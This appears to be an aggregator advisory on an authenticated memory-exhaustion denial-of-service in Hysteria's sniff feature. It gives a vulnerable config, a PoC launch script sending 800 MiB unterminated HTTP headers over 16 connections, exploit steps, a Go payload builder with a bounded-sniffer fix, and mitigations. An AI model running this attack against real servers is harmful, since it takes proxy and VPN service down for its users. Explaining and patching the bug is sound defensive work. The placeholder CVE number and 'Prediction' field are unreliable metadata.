Hysteria (core/v2), Allocation of Resources Without Limits or Throttling, CVE-2025-??? (High) -DC-Jun2026-692


Intro

Hysteria is an open-source proxy and VPN tool built on QUIC and tuned for lossy, unreliable networks. A high-severity vulnerability has been identified in its `sniff` feature, which inspects the first bytes of proxied connections to work out the protocol and destination. The core of the issue is that the server buffers and allocates memory for this inspection based on data the client controls, with no upper bound.
An authenticated client can exploit this by sending crafted traffic through the proxy. The report describes a QUIC packet that declares an extremely large crypto length, which the server trusts when sizing its allocation; the PoC on this page exercises the HTTP sniffing path instead, sending a header block that is never terminated so the sniffer keeps buffering until its timeout expires.
The Proof of Concept (PoC) demonstrates the attack against a Hysteria server configured with `sniff: enable: true`. The client opens multiple connections and sends an 800 MiB (838,860,800-byte) incomplete HTTP header on each, and the server allocates memory for all of it. In testing this consumed up to 16 GB of server memory, a Denial of Service (DoS) that can end with the process being killed Out-of-Memory (OOM).
The vulnerability is not reachable by default: it requires the `sniff` feature to be enabled and the attacker to hold valid authentication credentials. The root cause is the absence of bounds checking or resource limits on client-controlled input to the sniffer. The attack is performed over the network, requires low privileges, and has a high impact on availability. A fix is available in the patched release.

DailyCVE Form:

Platform: Hysteria
Version: <= 2.8.1
Vulnerability: Unbounded Memory Allocation
Severity: High (8.7)
date: 2026-05-06

Prediction: 2026-05-06

What Undercode Say:

Analysis of the vulnerability confirms it is a classic case of uncontrolled resource consumption (CWE-770, Allocation of Resources Without Limits or Throttling). The server blindly trusts the amount of data a client chooses to send before the sniffer can finish, leading to a direct path to Denial of Service.
The PoC from the GitHub report can be replicated and analyzed:

1. Server Configuration (`server.yaml`)

This configuration is required to make the server vulnerable. The key directive is `sniff: enable: true`; `tcpPorts: 80` selects the port the PoC targets so that its TCP streams are handed to the HTTP sniffer, and `timeout: 10s` is how long the sniffer will wait for a complete header.

listen: 127.0.0.1:8443
tls:
  cert: poc_server.crt
  key: poc_server.key
auth:
  type: password
  password: sniff-poc-password
sniff:
  enable: true
  timeout: 10s
  rewriteDomain: false
  tcpPorts: 80
masquerade:
  type: string
  string:
    content: nope
    statusCode: 404

2. Attack Execution (`poc.sh`)

This script compiles and runs the attack. It opens 16 connections and on each sends an incomplete header of 838,860,800 bytes (800 MiB), about 12.5 GiB in total before any allocator overhead, which is in line with the 16 GB observed. `--linger 12` holds each connection open for 12 s, past the server's 10 s sniff timeout, so the buffered data is retained for the full window, and `--target-host`/`--target-port` point at a port listed in `tcpPorts` so the stream actually reaches the HTTP sniffer.

#!/bin/bash
go build poc_sniff_http_dos.go
./poc_sniff_http_dos \
--server 127.0.0.1:8443 \
--auth sniff-poc-password \
--insecure \
--target-host 192.0.2.1 \
--target-port 80 \
--connections 16 \
--header-bytes 838860800 \
--linger 12

3. Attack Logic (`poc_sniff_http_dos.go` – Snippet)

The core of the attack is the `buildHeaderPayload` function, which builds an HTTP header block that is never terminated, so the server's sniffer keeps reading and buffering until its timeout fires.

func buildHeaderPayload(totalBytes, chunkSize int) []byte {
    // ...
    // Deliberately do not append the final empty line \r\n, forcing the server to keep reading the header for the whole sniff timeout.
    return out
}

How Exploit:

  1. Prerequisites: The attacker must have valid credentials (here a password) for the Hysteria server, and the server must have the `sniff` feature enabled with the target port listed in `tcpPorts`.
  2. Connection: The attacker uses a Hysteria client to establish an authenticated QUIC session to the server and opens one or more proxied TCP streams to a destination on a sniffed port (the PoC uses 192.0.2.1:80 and 16 streams).
  3. Crafting the Payload: On each stream the attacker sends an HTTP request whose header block is enormous (800 MiB in the PoC) and never ends with the empty line that terminates HTTP headers. The intro above also describes the same pattern in the QUIC sniffing path, where a client-declared crypto length is trusted when sizing the allocation.
  4. Exploitation: The data is streamed through the authenticated session and each stream is held open past the sniff timeout.
  5. Impact: While waiting for the end of the header the sniffer buffers everything it receives, without any cap, so memory grows with what the attacker sends multiplied by the number of streams. This exhausts server memory and ends in a Denial of Service (DoS), typically with the process killed by the OOM killer.
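To make the `buildHeaderPayload` snippet and the steps above concrete, the following is an added example written for this article, not code from the PoC or from the Hysteria project. It pairs a never-terminated header payload with two versions of an HTTP host sniffer: the unbounded pattern that keeps buffering until the client stops (the vulnerable shape), and a bounded one that abandons the sniff once a cap is reached. The payload format, the 4 KiB read size, the `X-Pad` header names and the `sniffHost`/`hostFromHeader` helpers are all assumptions made for illustration; the sizes are scaled down from the PoC's 800 MiB so it runs in memory.

```go
package main

import (
	"bytes"
	"errors"
	"fmt"
	"io"
	"strings"
)

// ErrHeaderTooLarge is what the hardened sniffer returns once a client has
// sent more header bytes than the cap without ever closing the header block.
var ErrHeaderTooLarge = errors.New("http sniff: header block exceeds limit")

var headerEnd = []byte("\r\n\r\n")

// buildHeaderPayload emits an HTTP/1.1 request whose header block is padded
// with X-Pad lines of about chunkSize bytes until roughly totalBytes have
// been produced. It deliberately never appends the empty line that ends a
// header block, so a sniffer waiting for "\r\n\r\n" keeps reading.
// Constructed for this example; the PoC's real function body is not on the page.
func buildHeaderPayload(totalBytes, chunkSize int) []byte {
	var out bytes.Buffer
	out.WriteString("GET / HTTP/1.1\r\nHost: 192.0.2.1\r\n")
	for i := 0; out.Len() < totalBytes; i++ {
		name := fmt.Sprintf("X-Pad-%d: ", i)
		pad := chunkSize - len(name) - len("\r\n")
		if pad < 1 {
			pad = 1
		}
		out.WriteString(name)
		out.WriteString(strings.Repeat("a", pad))
		out.WriteString("\r\n")
	}
	// No trailing "\r\n" here: the header block is intentionally left open.
	return out.Bytes()
}

// sniffHost reads a client's first bytes looking for the end of the HTTP
// header block and returns the Host value, the number of bytes retained in
// memory on the client's behalf, and an error.
//
// maxHeader <= 0 reproduces the vulnerable pattern: the buffer grows with
// whatever the client sends until the terminator arrives, the peer closes,
// or an external timeout fires. maxHeader > 0 is the hardened form: once
// that many bytes are held without a terminator, the sniff is abandoned
// with ErrHeaderTooLarge and nothing further is buffered.
func sniffHost(r io.Reader, maxHeader int) (host string, buffered int, err error) {
	var buf []byte
	tmp := make([]byte, 4096)
	for {
		n, rerr := r.Read(tmp)
		if maxHeader > 0 && len(buf)+n > maxHeader {
			n = maxHeader - len(buf) // retain at most maxHeader bytes
		}
		// Only the tail can hold a terminator that straddles this read.
		start := len(buf) - (len(headerEnd) - 1)
		if start < 0 {
			start = 0
		}
		buf = append(buf, tmp[:n]...)
		if i := bytes.Index(buf[start:], headerEnd); i >= 0 {
			return hostFromHeader(buf[:start+i]), len(buf), nil
		}
		if maxHeader > 0 && len(buf) >= maxHeader {
			return "", len(buf), ErrHeaderTooLarge
		}
		if rerr != nil {
			return "", len(buf), rerr
		}
	}
}

// hostFromHeader extracts the Host header value from a raw header block.
func hostFromHeader(hdr []byte) string {
	for _, line := range bytes.Split(hdr, []byte("\r\n")) {
		if k, v, ok := bytes.Cut(line, []byte(":")); ok && strings.EqualFold(string(k), "Host") {
			return strings.TrimSpace(string(v))
		}
	}
	return ""
}

func main() {
	// Scaled-down stand-in for the PoC's 800 MiB header: 64 KiB in 1 KiB lines.
	payload := buildHeaderPayload(64*1024, 1024)
	_, n, err := sniffHost(bytes.NewReader(payload), 0)
	fmt.Printf("unbounded sniffer: retained %d bytes, err=%v\n", n, err)
	_, n, err = sniffHost(bytes.NewReader(payload), 16*1024)
	fmt.Printf("bounded sniffer:   retained %d bytes, err=%v\n", n, err)
	host, _, err := sniffHost(strings.NewReader("GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"), 16*1024)
	fmt.Printf("well-formed request: host=%q err=%v\n", host, err)
}
```

The unbounded sniffer retains the entire payload and only gives up when the client stops sending; multiply that by the 16 connections in `poc.sh` and the PoC's 800 MiB per connection and the 16 GB figure follows. The bounded sniffer holds at most its cap per connection and fails closed, which is the behaviour a fix for this class of bug needs: the cap must apply to what is buffered, not just to how long the sniffer waits, because the timeout alone does nothing to limit how much arrives before it fires.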

Protection:

Upgrade: The most effective protection is to upgrade `github.com/apernet/hysteria/core/v2` (and the server binary built from it) to version 2.8.2 or later, where the vulnerability is patched.
Disable Sniffing: If upgrading is not immediately possible, set `sniff: enable: false` in the server configuration to remove the attack surface entirely. Trimming `tcpPorts` reduces exposure but does not remove it, since any listed port still reaches the sniffer.
Strict Authentication: Use strong, unique passwords and rotate shared ones. This only limits who can trigger the issue: any legitimately authenticated user, or an attacker holding a leaked credential, can still exhaust the server.
Resource Limits: Cap the memory the server process may use, for example with a cgroup limit (`MemoryMax=` in the systemd unit) or `ulimit`. Prefer the cgroup limit for a Go process, since `ulimit -v` restricts virtual address space, which the Go runtime reserves generously. This contains the damage to the Hysteria process rather than the whole host, but the process will still be killed, so it remains a denial of service for the application.

Impact

Denial of Service (DoS): The primary impact is a DoS condition where the Hysteria server becomes unresponsive.
Service Downtime: The server crash leads to complete service downtime for all users relying on the Hysteria proxy or VPN.
Memory Exhaustion: Successful exploitation can cause the server to exhaust all available RAM, potentially affecting other services running on the same host.
System Instability: If the host has no per-process memory limit, the kernel's OOM killer may terminate other processes besides Hysteria, destabilising the whole system.


Sources:

Reported By: github.com